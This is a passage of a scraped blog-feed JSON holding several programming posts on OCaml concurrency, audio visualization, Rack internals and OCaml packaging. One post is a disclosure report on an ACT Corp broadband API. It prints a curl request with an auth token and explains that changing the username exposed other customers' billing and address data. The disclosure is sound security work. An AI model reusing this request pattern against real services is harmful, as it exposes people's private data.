Algebraic Effects and Handlers\nExamples\nand more papers\nWiki\nGC bibliography\n    \nDamien Doligez and Xavier Leroy. “A concurrent, generational garbage collector for a multithreaded implementation of ML.” POPL 1993.\nSimon Marlow and Simon Peyton Jones. “Multicore garbage collection with local heaps.” ACM SIGPLAN Notices. Vol. 46. No. 11. ACM, 2011\nTodd Anderson, “Optimizations in a private nursery-based garbage collector”, ISMM, 2010.\nKC Sivaramakrishnan, Lukasz Ziarek, Suresh Jagannathan, “A Coherent and Managed Runtime for ML on the SCC”, MARC, 2012.\nLorenz Huelsbergen and Phil Winterbottom. “Very concurrent mark-&-sweep garbage collection without fine-grain synchronization.” ISMM 1998.\nScott Schneider, Christos D. Antonopoulos, and Dimitrios S. Nikolopoulos. “Scalable, locality-conscious multithreaded memory allocation.” ISMM 2006.",[],{"slug":2605,"title":2606,"link":2607,"pubDate":2608,"contentSnippet":2609,"tags":2610,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"monadic-reflections-on-concurrency","(Monadic) Reflections on Concurrency","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Freflection\u002Fmonads\u002Feffects\u002F2017\u002F06\u002F13\u002Fmonadic-reflections-on-concurrency\u002F","2017-06-13T12:13:00.000Z","We recently published a paper on concurrent system programming with effect\nhandlers. In this paper, we show\nthat with the help of effect handlers, we could express in direct-style,\nvarious interactions of a concurrent program with OS services that typically\nrequire callbacks. The question is what do we do about legacy code that uses\nmonadic concurrency libraries such as Lwt and Async. Surely a wholesale rewrite\nof all Lwt and Async code is a no go. This post is an exploration of some ideas\nto make Lwt and Async compatible with direct-style code.\nMonadic Reflection\nAndrzej Filinski introduced monadic reflection in his paper Representing\nMonads,\ncharacterizing the relationship between monadic style and continuation-passing\nstyle. Practically, in a language like multicore OCaml with native support for\ndelimited continuations, any monadic style program can also be written in\ndirect-style. Filinski introduces two operators to transform between the two\nstyles:\n\n\nreify transforms a direct-style computation to a monadic one and reflect\ngoes the other way. In multicore OCaml, we can implement monadic reflection for\nany monad as1:\n\n\nWe introduce an effect E which is parameterized with the monadic computation.\nWhen this effect is performed, it returns the result of performing this monadic\ncomputation. reify wraps the direct-style computation with an effect handler\nthat handles E m and binds the monadic computation m to the rest of the\ndirect-style computation. reflect simply performs the given monadic\ncomputation wrapped in E. The idea here is that whenever the monad does\nanything interesting, we perform the effect E which delegates the handling of\ninteresting monadic behavior to the effect handler.\nMonadic to Direct\nWe implement chameneos-redux benchmark\nfrom the computer language benchmarks game in direct-style and using concurrency\nmonad. The benchmark is intended to evaluate the cost of context switching\nbetween tasks. The source code is available\nhere\nin a single-self contained file. We implement both versions as functors\n(direct-style is ChameneosD (S : SchedD) (M : MVarD) and monadic-style is\nChameneosM (S : SchedM) (M : MVarM)) parameterized by a scheduler and an MVar\nimplementation. The signatures of direct and monadic style scheduler and MVars\nare:\n\n\nUsing monadic reflection on the monadic scheduler SchedM and MVar MVarM\nimplementations, we can instantiate the direct-style functor ChameneosD:\n\n\nWe can even instantiate the direct-style functor ChameneosD with Lwt with no\nextra effort:\n\n\nThus, monadic reflection lets you utilize Lwt and Async in direct-style.\nImportantly, one gets back backtraces and the use of raise and try...with\nfor exception handling.\nDirect to Monadic\nLwt and Async libraries provide strong guarantees on task interleavings. In\nparticular, both libraries provide automatic mutual exclusion – context\nswitches between tasks only occur at bind points. In other words, any\nnon-monadic functions, such as calls to standard library functions, are\nguaranteed not to context switch. With effect handlers, this is no longer the\ncase since effects are not tracked in the types in multicore OCaml.\nWe can recover the type level marker with a shallow embedding:\n\n\nAnd we can go back to direct-style using monadic reflection:\n\n\nPerformance\nWe compared the performance of different configurations for running\nchameneos-redux for 1 million iterations:\n  \nThe results show that monadic reflection has around 9% overhead on average over\nthe baseline monadic implementations. This is a small price to pay for the\nadvantage for programming in direct-style.\nConclusion\nWe have been prototyping a multicore-capable I\u002FO library for OCaml called\nAeio, with compatibility layer for\nLwt and Async built on top of this library. Monadic reflection and other\ntechniques can help resolve the schism between monadic libraries and\ndirect-style code.\nFootnotes\nThanks to Jeremy Yallop for introducing me to monadic reflection and contributing this implementation. ↩",[],{"slug":2612,"title":2613,"link":2614,"pubDate":2615,"contentSnippet":2616,"tags":2617,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"spectrumyzer-visualization","Building the perfect audio visualization","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F05\u002F01\u002Fspectrumyzer-visualization\u002F","2017-05-01T00:00:00.000Z","I made this as my animated wallpaper recently (Click to play\u002Fpause):\n\n\nabove video has a audio component, click at your own peril.\nWhat follows is the story and the tech behind making this.\nThe Wallpaper\nI have a long history of using custom wallpapers. This was my wallpaper from 2014-:\n\nWhen I asked Vikalp to design a new one, I knew I wanted something that\nwas slightly more softer. This is what he came up with, after a few iterations:\n\nThis wasn’t the final iteration, and both of us agreed that there was something missing.\nVisualizations\nI saw a colleague using cava and spent a bit of time trying out different\nvisualization software. The ones that I tried out:\ncava\n  works perfectly with i3, runs on a terminal. I couldn’t get it to work cleanly with transparency. \n  mildrop\n  Winamp’s legacy. This works great for parties, but is not really an everyday-use visualizer. \n  spectrumyzer\n  Worked with transparency, but limited to bars visualization.\n\n\nI decided to go ahead with Spectrumyzer (This is the default config):\n\nThe Traffic Jam\nThe very same day, stuck in a traffic jam1, I asked Vikalp for some color ideas on the visualization.\nThe obvious 2 were tried first:\n\n\nIt finally dawned on us to use the light blue variant with padding set to zero:\n\nHere is one showing the actual positioning (set using the offsets):\n\nBezier Curves\nWith the padding set to zero, it already looked great. I ended up using this\nas my wallpaper for the next one week. Vikalp wanted to make the bars\nnon-rectangular, and I spent some time figuring out how to make waveforms using\nbezier curves2. The basic learning from my experiments were:\nCairo has methods for drawing cubic bezier curves.\nCubic bezier curves have 2 control points.\nThe control points must be symmetric (equidistant) as well as parallel to the origin points.\nThe parallel part ensures that the ending and starting line segments are always tangential giving a smooth joining.\nThis is roughly what you want to do when drawing waveforms:\n\nIf you are interested in playing around with Bezier curves, see Animated Bézier Curves. A Primer on Bézier Curves is a math-heavy explanation if you want to read further3.\nThe code I wrote picks the midpoints of the bars and then connects them using bezier curves:\n\n# control point cords\n# Make sure these are symmetric\nc1x = rect_top_mid_x + 16\nc2x = next_rect_top_mid_x - 16\nc1y = rect_top_mid_y\nc2y = next_rect_top_mid_y\n\n\nI also had to make the number of bars configurable (this is default=64, which doesn’t look great):\n\nHere is the complete final result in HD:\n\n\nWhat I learned\nBezier curves are not magic.\nDrawing pixels on screen and filling them was quite easy with Cairo and Python.\nCoding is wizardry. The things that I take for granted every day (take a multi-page website and get useful tabular data out of it, for eg) are unthinkable for most people. The idea of doing water waves was something I knew would be possible before I even looked at the codebase.\nIf you’d like to replicate this setup, or build upon it, here is my spectrum.conf file.\nI also filed a PR (now merged!) to the spectrumyzer project adding support for curve based renders.\nSony World Junction - Where startup ideas are born. ↩\nThe Spectrumyzer codebase turned out to be fairly easy to understand. It was just cairo and pyGTK. ↩\nA Primer on Bézier Curves was published on HN just a few days after I finished this project. ↩",[],{"slug":2619,"title":2620,"link":2621,"pubDate":2622,"contentSnippet":2623,"tags":2624,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"book-review-2016","Book Review (2016)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F04\u002F02\u002Fbook-review-2016\u002F","2017-04-02T00:00:00.000Z","I tweeted this a while back about my reading progress in 2016, and thought I’d do a post about what I read.\nMade a graph of my @goodreads reading progress in 2016. I only picked up the pace sometime in May, but managed to read ~10k pages this year.\n\nJanuary 13, 2017\nContinuing with the review tradition from last year, here are the top 3 books that I read in 2016:\nThe Library at Mount Char [review]\nBinti (Hugo winner for Best Novella, SF)\nLolita\nOther books that I enjoyed were “Bands of Mourning”, the 3rd book in Mistborn Era 2, and the Powder Mage Trilogy which I found hard to put down.\nI decided to aim for 36 books in 2016 (as well as 2017 now), and crossed that nicely. I picked 36 because it corresponds to 3 books a month or 1 book every 10 days, which makes for a goal that is easily tracked. I count everything that goodreads might count as a book (which is both good and bad), but I stick to it. Far more important for me would be the page count, which I charted at the end of the year and I read ~830 pages a month, which I’m pretty happy with.\nI’m hoping to read more technical books in 2017, and have made some progress on that front with re-reading SICP.\nIf you are interested in the script that generated the graph, you can find it on github.",[],{"slug":2626,"title":2627,"link":2628,"pubDate":2629,"contentSnippet":2630,"tags":2631,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"act-vulnerability","Vulnerability Report: ACT Corp","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F03\u002F26\u002Fact-vulnerability\u002F","2017-03-26T00:00:00.000Z","ACT, for those who don’t know is one of India’s most popular broadband providers.\nThis is a very brief and concise summary.\nACT has a mobile application\nThat allows you to login and check your plan details, data usage etc\nI’ve been wanting to build a command line application that lets me check the balance easily\nI tried scripting their website, but it was too much javascript.\nThe mobile app uses an API to do the same\nThe API happens to have really bad auth\nGot fixed almost 3 months after reporting this.\nRequest\n\ncurl https:\u002F\u002Fmyfibernet.actcorp.in\u002Fapi\u002Fuser\u002Fplandetails -H \"Content-Type: application\u002Fjson\" -H \"Authtoken: 2aee21dfb1ef77707c30f48ccc513ad60b74d1fc6a84d60ecc32323ab5941469\" -H \"Apiversion: 1.0\" -H \"Appversion: 32\" -H \"Devicetype: 1\" -H \"Deviceid: 68590327e3e0ca81\" -H \"Mobilenumber: 9999999999\" -H \"Mid: 8973808103928d98703e65c0106b7a9d4001886234afbc2d7ce6415b75f9c216\" --data '{\"username\":\"11111111\"}'\n\n\nThe API responds back with the following:\n\n{\n  \"code\": 200,\n  \"status\": true,\n  \"message\": \"Success\",\n  \"data\": {\n    \"plan_details\": {\n      \"agreement_info\": {\n        \"agreement_no\": \"XXXXXXXXXX\",\n        \"promotion_code\": \"\",\n        \"package_code\": \"ACTESS01M\",\n        \"package_name\": \"\",\n        \"agreement_startdate\": \"DD\u002FMM\u002FYYYY\",\n        \"expiry_date\": \"\",\n        \"status\": \"\",\n        \"entity_code\": \"[]\",\n        \"subscription_period\": \"[]\",\n        \"payterm\": \"[]\",\n        \"billingcycle_code\": \"[]\",\n        \"contract_type\": \"ISP\",\n        \"outlets\": \"1\",\n        \"service_points\": \"\",\n        \"package_tenure\": int,\n        \"due_date\": \"\"\n      },\n      \"product_info\": {\n        \"product_code\": \"\",\n        \"product_desc\": \"\"\n      }\n    },\n    \"plan_usage_info\": {\n      \"service_id\": \"ACTESS01M\",\n      \"service_name\": \"ACTESS01M\",\n      \"outbyteslimit\": 322122547200,\n      \"outbytesremaining\": 153400581140,\n      \"outbytesused\": 168721966060\n    },\n    \"bill_info\": {\n      \"accountno\": \"111111112233\",\n      \"subscribername\": \"NAME\",\n      \"phonenumber\": \"PHONENUMBER\",\n      \"address\": {\n        \"line1\": \"YUP\",\n        \"line2\": \"THESE TWO LINES WERE FILLED\",\n        \"line3\": \"\",\n        \"district\": \"AND THIS\",\n        \"city\": \"BANGALORE\",\n        \"state\": \"KARNATAKA\",\n        \"country\": \"India\"\n      },\n      \"billno\": \"10000001111\",\n      \"billdate\": \"DD\u002FMM\u002F2016\",\n      \"account_period\": \"01\u002FMM\u002F2016-30\u002FMM\u002F2016\",\n      \"previous_due\": \"\",\n      \"current_invoice_amt\": \"1234\",\n      \"total_due\": \"0\",\n      \"bill_due_date\": \"15 Nov 2016\"\n    }\n  }\n}\n\n\nSome of these are empty fields, and some values that I didn’t understand I’ve replaced with [].\nThe fun part is that the request is actually a POST and contains the following data:\n{\"username\":\"11111111\"}\nI happen to have friends who also use ACT. I asked around for usernames, and just by changing this one parameter in the request, I could access the complete details of almost everyone else.\nAlmost everyone, because for certain cases, I get a valid empty response. Valid because it has the same schema, but empty because all values are empty strings. Don’t know what that happens consistently only for certain accounts. (One of these was a Hyd account, the other in BLR).\nIf you are interested I’m working on a simple API that lets you access the ACT API to check the same details. It would ask you for an OTP the first time you login, and then cache the credentials to let you check the balance easily.\nI’ve reported this to ACT as soon as I found it. Will disclose after I’ve given them some time!\nUpdate: This was reported and fixed by ACT after I managed to find a contact via an investor (really!).\nTimeline\nDate\n      Details\n    \n29 Nov 2016\n      Vulnerability Identified\n    \n29 Nov 2016\n      Email sent to ACT, no response\n    \n6 Dec 2016\n      Email sent with partial customer details to explain scope of the issue, no response\n    \n8 Dec 2016\n      Reminder sent, no response\n    \n20 Jan 2017\n      Another reminder with a writeup sent. I also set a deadline of 29th January (2 months since first contact). Also got in touch with CERT-IN. No response\n    \n23 Jan 2017\n      Accidentally an investor in ACT saw my tweet and responded over twitter. Send a writeup, along with the suggestion to take down the application\n    \n24 Jan 2017\n      ACT reports issue is fixed. I test and report back as fixed the next day\n    \n26 Mar 2017\n      Report published\n    \nHowever, the huge timeline involved here pretty much guarantees that if you are an ACT customer,\nyour data is out there in the public.",[],{"slug":2633,"title":2634,"link":2635,"pubDate":2636,"contentSnippet":2637,"tags":2638,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"cctc-vm-images","CCTC Challenge VM","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F03\u002F25\u002Fcctc-vm-images\u002F","2017-03-25T00:00:00.000Z","This is specifically about the contest held in 2011,\n6 years ago. I’ve written about my experience\nduring the contest on this blog.\nMore specifically, Round 2 of the contest was a pentesting\nscenario where we were only provided with a VM image\nand asked to test it and report any vulnerabilities\nthat we found.\nI recently found the VirtualBox images, and thought\nI’d share them as a easy intro to web security.\nInstructions\nReach out to me for the VM image\nHack.\nCredentials are student:student (username:password)\nOpen \u002Fcctc in your browser.\nRules\nOnly application and its serving components can be tested for vulnerabilities. The serving components include\n    \nWebserver\nOperating System\nAny other services\u002Ffiles in the guest machine and guest operating system\nAny vulnerability identified in any component outside the above mentioned ones, will not be used for evaluation\nAll participants should necessarily submit all the exploit codes\u002Fcustom scripts written to identify the vulnerabilities in the system.\nThe deadline for the original challenge was 2 weeks, but you’re free to take as much time as you want. Feel free to publish a list of vulnerabilities you find.\nThe attached spreadsheet provides format of the report, challenges in scope, and the details to be filled out for each vulnerability identified.\nThe tasks to be performed are mentioned in the report. Each task consists of the following sections:\nVulnerability\u002FVulnerabilities - You need to write the description of the vulnerability\nRoot Cause(s) - What is the root cause of the vulnerability?\nApproach adopted (Steps with screenshots) – Write the steps followed to exploit the vulnerability along with screenshot of the final screen and\u002For intermediate steps.\nRemediation with sample code snippet – Write the remediation steps to address this vulnerability. Also, write the sample code if applicable.\nAlso attached is a step by step installation guide for application set-up.\nFew points to be considered:\nChallenges can be attempted and completed in any order.\nOnly the application and its serving components can be tested for vulnerabilities. All other components like VMware, if tested for security issues, would lead to disqualification.\nI will not be responsible for the discovery\u002Fnotification of any zero day vulnerability in any software.  If any zero-day vulnerability is identified, it is the responsibility of the concerned participant to notify the vulnerability to the respective vendor as per vendor’s policy.\nIf you are really interested, you can find a copy of the report\nwe submitted at \u002Freports\u002Fcctc.\nThanks to Harshil and Shobhit for working alongside on this.",[],{"slug":2640,"title":2641,"link":2642,"pubDate":2643,"contentSnippet":2644,"tags":2645,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"building-and-publishing-an-ocaml-package","Building and Publishing an OCaml Package: Q1 2017","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fopam\u002Ftopkg\u002Fcarcass\u002F2017\u002F03\u002F05\u002Fbuilding-and-publishing-an-OCaml-package\u002F","2017-03-05T13:56:00.000Z","One of the key indicators of maturity of a language ecosystem is the ease of\nbuilding, managing and publishing software packages in that language. OCaml\nplatform has made steady progress in the last few years to this end. While\nOPAM simplified package (and compiler) management,\nthe developing and publishing packages remained a constant pain point. This\nsituation has remarkably improved recently with the\nTopkg and\nCarcass. This post provides a short\noverview of my workflow for building and publishing an OCaml package using Topkg\nand Carcass.\nTopkg is packager for distributing OCaml software. It provides an API for\ndescribing rules for package builds and installs. Topkg-care provides the\ncommand line tool topkg with support for creating and linting the\ndistribution, publishing the distribution and its documentation on WWW, and\nmaking the package available through OPAM. Carcass is a library and a command\nline tool for defining and generating the directory structure for the OCaml\npackage. At the time of writing this post, carcass was unreleased.\nWorkflow\nI recently released a package for mergeable\nvectors based on operational\ntransformation. The following describes my workflow to build and publish the\npackage.\nSetup\nInstall topkg-care and carcass:\n\n$ opam install topkg-care opam-publish\n$ opam pin add -kgit carcass https:\u002F\u002Fgithub.com\u002Fdbuenzli\u002Fcarcass\n\n\nDevelop\nCreate the directory structure\n    \n\n  $ carcass body topkg\u002Fpkg mergeable_vector\n\n    \nInit\n    \n\n  $ cd mergeable_vector && git init && git add . && git commit -m \"First commit.\"\n  $ git remote add origin https:\u002F\u002Fgithub.com\u002Fkayceesrk\u002Fmergeable-vector\n  $ git push --set-upstream origin master\n\n    \nDevelop: The mergeable_vector\u002Fsrc directory has the source files. I use\nthis Makefile\nat the root of the package.\nTest the package locally with OPAM\n    \n\n  $ opam pin add mergeable_vector .\n\n    \nPublish\nUpdate the\nCHANGES file for the new release.\nTag the release\n    \n\n  $ topkg tag 0.1.0\n\n    \nBuild the distribution\n    \n\n  $ topkg distrib\n\n    \nPublish the distribution\n    \n\n  $ topkg publish distrib\n\n    \nThis makes a new release on Github.\nPublish the doc\n    \n\n  $ topkg publish doc\n\n    \nThis publishes the documentation on Github.\nMake an OPAM package info and submit it to OPAM repository at opam.ocaml.org.\n    \n\n  $ topkg opam pkg\n  $ topkg opam submit\n\n    \nThis creates a Github PR\nto the opam-repository. Once the\nPR is merged, the package becomes available to the users.",[],{"slug":2647,"title":2648,"link":2649,"pubDate":2650,"contentSnippet":2651,"tags":2652,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"lets-learn-rack-by-implementing-it-from-scratch-html","Let’s learn rack by implementing it from scratch","https:\u002F\u002Faboobacker.in\u002F2017\u002F02\u002F15\u002Flets-learn-rack-by-implementing-it-from-scratch.html","2017-02-15T19:58:20.000Z","Rack is a framework for ruby web frameworks. If you developed apps in ruby frameworks like rails, hanami, Sinatra, you already used  Rack. Almost all ruby web frameworks use rack under the hood, If you are already familiar with rack then you can skip next step and go to re building  part\nIntroduction To Rack\nRack provides minimalistic API to interact, First let’s have a look at rack\nA rack app is an object which takes request environment hash and provides array of 3 elements the output, rack object should respond to the method call\nThe HTTP response code\nHeaders hash\nresponse body object which responds to each\nThe obvious question here is why does rack says about responding to the particular method. This one of the powerful paradigm available in ruby called duck typing. ie rack doesn’t care about the object or it’s implementation as long as it responds to the particular method\nLet’s take a look at a simple example.\nInstall rack\n\n  gem install rack\n\n\ncreate a file with name config.ru\n\n# config.ru\nrun Proc.new { |env| ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']] }\n\n\nand run the command rackup\nNow open the browser and vist localhost:9292\nCongratulations !, You just made a rack app with just a single line\nNow let’s have look at the above example\nWe have a proc object which responds to call method. 200as status  code  , an array consist of\n{'Content-Type' => 'text\u002Fhtml'} as Response header\nand\n['Hello World \\'d'] as body\nSince rack do not care about the kind of rack object, we can do the same using class or an object\n\n\nclass SuperCoolApp\n  def call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']]\n  end\nend\nrun SuperCoolApp\n\n\n\n\nclass CoolApp\n  def self.call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']]\n  end\nend\n\nrun SuperCoolApp.new\n\n\nBut this doesn’t do anything interesting, this will just display Hello World for all requests . Because we were returning same output without even considering the parameter env . Let’s have a look into by returning env hash as output\n\nclass CoolApp\n  def self.call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, [env.inspect]]\n  end\nend\n\n\n\nNow run rackup and goto localhost:9292\u002Fhello\u002Fworld\nOutput will be something like this\n\n{\"rack.version\"=>[1, 3], \"rack.errors\"=>#>>, \"rack.multithread\"=>true, \"rack.multiprocess\"=>false, \"rack.run_once\"=>false, \"SCRIPT_NAME\"=>\"\", \"QUERY_STRING\"=>\"\", \"SERVER_PROTOCOL\"=>\"HTTP\u002F1.1\", \"SERVER_SOFTWARE\"=>\"puma 3.6.0 Sleepy Sunday Serenity\", \"GATEWAY_INTERFACE\"=>\"CGI\u002F1.2\", \"REQUEST_METHOD\"=>\"GET\", \"REQUEST_PATH\"=>\"\u002Fhello\u002Fworld\", \"REQUEST_URI\"=>\"\u002Fhello\u002Fworld\", \"HTTP_VERSION\"=>\"HTTP\u002F1.1\", \"HTTP_HOST\"=>\"localhost:9292\", \"HTTP_CONNECTION\"=>\"keep-alive\", \"HTTP_UPGRADE_INSECURE_REQUESTS\"=>\"1\", \"HTTP_USER_AGENT\"=>\"Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F54.0.2840.71 Safari\u002F537.36\", \"HTTP_ACCEPT\"=>\"text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Fwebp,*\u002F*;q=0.8\", \"HTTP_DNT\"=>\"1\", \"HTTP_ACCEPT_ENCODING\"=>\"gzip, deflate, sdch, br\", \"HTTP_ACCEPT_LANGUAGE\"=>\"en-US,en;q=0.8,ml;q=0.6\", \"SERVER_NAME\"=>\"localhost\", \"SERVER_PORT\"=>\"9292\", \"PATH_INFO\"=>\"\u002Fhello\u002Fworld\", \"REMOTE_ADDR\"=>\"127.0.0.1\", \"puma.socket\"=>#, \"rack.hijack?\"=>true, \"rack.hijack\"=>#, \"rack.input\"=>#>, \"rack.url_scheme\"=>\"http\", \"rack.after_reply\"=>[], \"puma.config\"=>#\"development\", :pid=>nil, :Port=>9292, :Host=>\"localhost\", :AccessLog=>[], :config=>\"\u002Fhome\u002Ftachyons\u002Fcode\u002Frack\u002Fconfig.ru\"}, {:log_requests=>false, :environment=>\"development\", :binds=>[\"tcp:\u002F\u002Flocalhost:9292\"], :app=>#, @content_length=nil>>, @logger=#>>>>}, {:environment=>\"development\"}, {}], @defaults={:min_threads=>0, :max_threads=>16, :log_requests=>false, :debug=>false, :binds=>[\"tcp:\u002F\u002F0.0.0.0:9292\"], :workers=>0, :daemon=>false, :mode=>:http, :worker_timeout=>60, :worker_boot_timeout=>60, :worker_shutdown_timeout=>30, :remote_address=>:socket, :tag=>\"rack\", :environment=>\"development\", :rackup=>\"config.ru\", :logger=>#>, :persistent_timeout=>20}>, @plugins=#>, \"rack.tempfiles\"=>[]}\n\n\n\nNow change url and see the changes output\nTo make it clear Let’s build a simple app to hello\n\nclass CoolApp\n  def self.call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, [ \"Hi \" + env['REQUEST_PATH'].split('\u002F').join(\" \")]]\n  end\nend\n\nrun CoolApp\n\n\nRun rackup again, and go to localhost:9292\u002Faboobacker\u002Fmk\nApp will respond “Hi aboobacker mk”\nYou can implement your own logic using the env variable provided by rack\nRack also provides Rack Request Abstraction which provides a convenient interface to a Rack environment.\nBut that is not the end, rack also provides feature called middleware, which let you use multiple rack apps as pipeline . ie output of one rack app will feed as input to next rack app . Let’s check that by one example\n\nclass ReverseOutput\n  def initialize(app)\n    @app = app \n  end\n\n  def call(env) \n    status, headers, body = @app.call(env) \n    body = body.map { |msg| msg.reverse } \n    [status, headers, body] \n  end \nend \n\nclass CoolApp\n  def self.call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, [ \"Hi \" + env['REQUEST_PATH'].split('\u002F').join(\" \")]]\n  end\nend\n\nuse ReverseOutput\nrun CoolApp\n\n\nHere we made a simple middleware ReverseOutput which will reverse the response body, You can add any number of middlewares like this, also you can use pre defined middlewares provided by the rack and open source general purpose middlewares. List of middlewares\nBuilding from scratch\nNow let’s have a look at how the rack works by making a rack like library from scratch, Let’s name it Srack. But one obvious question here is why rackup file is config.ru, not config.rb ? . Also from where the methods like use, run etc are coming\nLet’s look at our first code sample in a different way\n\n# app.rb\n  Rack::Builder.app do\n    run Proc.new { |env| ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']] }\n  end\n\n\nHere we can see that config.ru is a block that is to be passed to Rack::Builder.app method\n\nbundle gem srack\n\n\nNow remove all TODOs from srack.gemspec So that we can run the test cases . Now if we run test cases it will show one failure message\n\nFailed examples:\n\nrspec .\u002Fspec\u002Fsrack_spec.rb:8 # Srack does something useful\n\n\n\nAnd it is true, we haven’t done anything useful yet\nFirst thing we have to do is to build an executable equiallant to rackup, Let’s call it srackup\n\ntouch exe\u002Fsrackup\n\n\n\n#!\u002Fusr\u002Fbin\u002Fenv ruby\n\nrequire \"srack\"\nSrack::Server.start\n\n\nI copied above file from rack repo to make sure that we are following the same way . Since we haven’t implemenetd Srack::Server this won’t work yet . So let’s make that first\nSince we have to make instance of Rack::Server we can make it as a class and define start as the class method\n\nmodule Srack\n  class Server\n    def self.start\n    end\n  end\nend\n\n\nNow we have Srack::Server.start method. But it is doing nothing. Since we want Server object, we can delegate our start method to it’s instance method.\n\nmodule Srack\n  class Server\n    def self.start\n      new.start\n    end\n\n    def start\n    end\n  end\nend\n\n\nNow let’s set some default options for our app\n\nmodule Srack\n  class Server\n    def initialize\n     @options = default_options\n    end\n\n    def self.start\n      new.start\n    end\n\n    def start\n    end\n\n    private\n    \n    def default_options\n      {\n        environment: \"localhost\",\n        Port: \"9393\",\n        Host: \"localhost\"\n      }\n    end\n  end\nend\n\n\nNow we have to build the app from config.ru or the file specified as argument, we can store it in @options hash with the key config\n\nmodule Srack\n  class Server\n    def initialize\n      @options = default_options \n      @options[:config] = ARGV[0] if ARGV[0]\n      @app = build_app\n    end\n\n    def self.start\n      new.start\n    end\n\n    def start\n    end\n\n    private\n    \n    def default_options\n      {\n        environment: \"localhost\",\n        Port: \"9393\",\n        Host: \"localhost\",\n        config: 'config.ru'\n      }\n    end\n\n    def build_app\n      Builder.parse_file(@options[:config])\n    end\n  end\nend\n\n\nHere we are we are using the Srack::Builder to parse the config file and load app from it . Let’s implement that logic in Builder factory\n\nmodule Srack\n  class Builder\n    def self.parse_file(config)\n      config_file = ::File.read(config)\n      new_from_string(config_file)\n    end\n\n    def self.new_from_string(builder_script)\n      eval \"Rack::Builder.new {\\n\" + builder_script + \"\\n}.to_app\"\n    end\n  end\nend\n\n\n\nThe first method is self-explanatory, it just read the file and passes the file body to new_from_string . The method new_from_string takes the file contents, convert it into a proc and pass to Rack::Builder.new . So that we can execute the contents of config.ru in the context of the builder\nRemember our first rack app ?\n\n# config.ru\nrun Proc.new { |env| ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']] }\n\n\nIn order to execute this\nBuilder class should accept block for initialize method\nAnd execute it within the context of Builder object\nBuilder class also should have methods run and to_app as setter and getter\nLet’s see it in code\n    \n\nmodule Srack\n  class Builder\n def initialize(&block)\n   instance_eval(&block) if block_given?\n end\n\n def run(app)\n   @app = app\n end\n\n def to_app\n   @app\n end\n\n def self.parse_file(config)\n   config_file = ::File.read(config)\n   new_from_string(config_file)\n end\n\n def self.new_from_string(builder_script)\n   eval \"Srack::Builder.new {\\n\" + builder_script + \"\\n}.to_app\"\n end\n  end\nend\n\n    \nNow we have Builder class, But start method in Srack::Server class is still empty, In order to do that we have to connect to some real server. Remember when we mentioned rack is an interface to web servers?\n\nmodule Srack\n  class Server\n    ...\n    def start\n      server.run @app, @options\n    end\n\n    private\n\n    def server\n      @server ||= Srack::Handler.default\n    end\n    ...\n  end\nend\n\n\nSrack will have handlers for each type of servers, So that we can global api for handlers, ie all handlers should respond to run method with 2 arguments @app and @options\n\n# lib\u002Fsrack\u002Fhandler.rb`\nmodule Srack\n  module Handler\n    autoload :Thin, 'srack\u002Fhandler\u002Fthin'\n    def self.default\n      Handler::Thin\n    end\n  end\nend\n\n\n\n# lib\u002Fsrack\u002Fhandler\u002Fthin.rb\nrequire 'thin'\nmodule Srack\n  module Handler\n    class Thin\n      def self.run(app, options = {})\n        host = options[:Host]\n        port = options[:Port]\n        args = [host, port, app, options]\n        server = ::Thin::Server.new(*args)\n        server.start\n      end\n    end\n  end\nend\n\n\nHere made handler module which can accomodate multple handlers, In this example we used thin as the default server . To use thin inside our app, we have to include it in our srack.gemspec\n\nspec.add_dependency \"thin\"\n\n\nNow you can build the gem to test\n\ngem build srack.gemspec\ngem install srack-0.1.0.gem\n\n\nNow our srack is capable for running our first rack app\nJust goto the directory with the file config.ru and run srackup\nImplementing middleware\nAs discussed earlier one of the widely used feature in the rack is middleware. Let’s see how it works\nA middleware will take the output(triplet) of rack app and modify it and give to next middleware or the app\nWe can make some tweaks in Srackup::Builder to accommodate this\n\n...\nclass Builder\n  ...\n  def initialize(&block)\n      @use = []\n      instance_eval(&block) if block_given?\n    end\n\n    def run(app)\n      @run = app\n    end\n\n    def use(middleware, *args, &block)\n      @use \u003C\u003C proc {|app| middleware.new(app, *args, &block)}\n    end\n\n    def to_app\n      app = @run\n      app = @use.reverse.inject(app) { |a,e| e[a] }\n      app\n    end\n    ...\nend\n...\n\n\nHere we defined an extra method use which will accept middleware as input. Also we have a new instance variable array @use which will store procs which accept app as input and returns new middleware object in return\nAlso, we changed to_app in such way that middlewares will be executed in the reverse order of calling\nNow our app can also handle middlewares\nIf something is missing, or getting some errors, you can cross check with my repo 